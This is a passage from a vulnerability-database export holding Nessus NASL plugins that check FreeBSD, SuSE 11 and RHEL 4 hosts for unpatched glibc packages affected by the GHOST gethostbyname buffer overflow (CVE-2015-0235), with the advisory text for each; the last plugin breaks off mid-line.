"cvelist": ["CVE-2015-0235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-c6-devtools", "p-cpe:/a:freebsd:freebsd:linux-f10-devtools", "p-cpe:/a:freebsd:freebsd:linux_base-c6", "p-cpe:/a:freebsd:freebsd:linux_base-f10", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0765DE84A6C111E4A0C1C485083CA99C.NASL", "href": "https://www.tenable.com/plugins/nessus/81062", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81062);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0235\");\n\n script_name(english:\"FreeBSD : glibc -- gethostbyname buffer overflow (0765de84-a6c1-11e4-a0c1-c485083ca99c) (GHOST)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Robert Kratky reports :\n\nGHOST is a 'buffer overflow' bug affecting the gethostbyname() and\ngethostbyname2() function calls in the glibc library. This\nvulnerability allows a remote attacker that is able to make an\napplication call to either of these functions to execute arbitrary\ncode with the permissions of the user running the application. The\ngethostbyname() function calls are used for DNS resolving, which is a\nvery common event. To exploit this vulnerability, an attacker must\ntrigger a buffer overflow by supplying an invalid hostname argument to\nan application that performs a DNS resolution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/1332213\"\n );\n # http://www.openwall.com/lists/oss-security/2015/01/27/9\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2015/01/27/9\"\n );\n # https://vuxml.freebsd.org/freebsd/0765de84-a6c1-11e4-a0c1-c485083ca99c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd7b81d9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-devtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-devtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-c6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-f10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-c6<6.6_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-f10>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-devtools<6.6_3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-devtools>=0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:42:00", "description": "This update for glibc fixes the following security issue :\n\n - A vulnerability was found and fixed in the GNU C Library, specifically in the function gethostbyname(), that can lead to a local or remote buffer overflow.\n (bsc#913646). (CVE-2015-0235)", "cvss3": {"score": null, "vector": null}, "published": "2015-01-27T00:00:00", "type": "nessus", "title": "SuSE 11 Security Update : glibc (SAT Patch Numbers 10202,10204,10206)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:glibc", "p-cpe:/a:novell:suse_linux:11:glibc-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-devel", "p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-html", "p-cpe:/a:novell:suse_linux:11:glibc-i18ndata", "p-cpe:/a:novell:suse_linux:11:glibc-info", "p-cpe:/a:novell:suse_linux:11:glibc-locale", "p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-profile", "p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit", "p-cpe:/a:novell:suse_linux:11:nscd", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_GLIBC-150122.NASL", "href": "https://www.tenable.com/plugins/nessus/81039", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81039);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"SuSE 11 Security Update : glibc (SAT Patch Numbers 10202,10204,10206)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for glibc fixes the following security issue :\n\n - A vulnerability was found and fixed in the GNU C\n Library, specifically in the function gethostbyname(),\n that can lead to a local or remote buffer overflow.\n (bsc#913646). (CVE-2015-0235)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"\nApply the correct SAT patch number for your operating system :\nSLES11 SP1: 10202\nSLES11 SP2: 10204\nSLED/SLES11 SP3: 10206\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\n# 11.1\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-devel-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-html-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-i18ndata-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-info-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-locale-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-profile-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"nscd-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.1-0.60.1\")) flag++;\n\n# 11.2\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-devel-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-html-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-i18ndata-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-info-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-locale-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-profile-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"nscd-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"glibc-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.3-17.45.55.5\")) flag++;\n\n# 11.3\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-devel-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-i18ndata-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-locale-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"nscd-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i686\", reference:\"glibc-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i686\", reference:\"glibc-devel-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-i18ndata-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"nscd-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-devel-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-html-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-i18ndata-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-info-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-locale-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-profile-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"nscd-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.3-17.74.13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:41:30", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-30T00:00:00", "type": "nessus", "title": "RHEL 4 : glibc (RHSA-2015:0101) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-02-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-profile", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nptl-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2015-0101.NASL", "href": "https://www.tenable.com/plugins/nessus/81104", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0101. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81104);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"RHSA\", value:\"2015:0101\");\n\n script_name(english:\"RHEL 4 : glibc (RHSA-2015:0101) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0101\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0101\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"glibc-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-2.3.4-2.57.el4.2\")) flag++;\n if 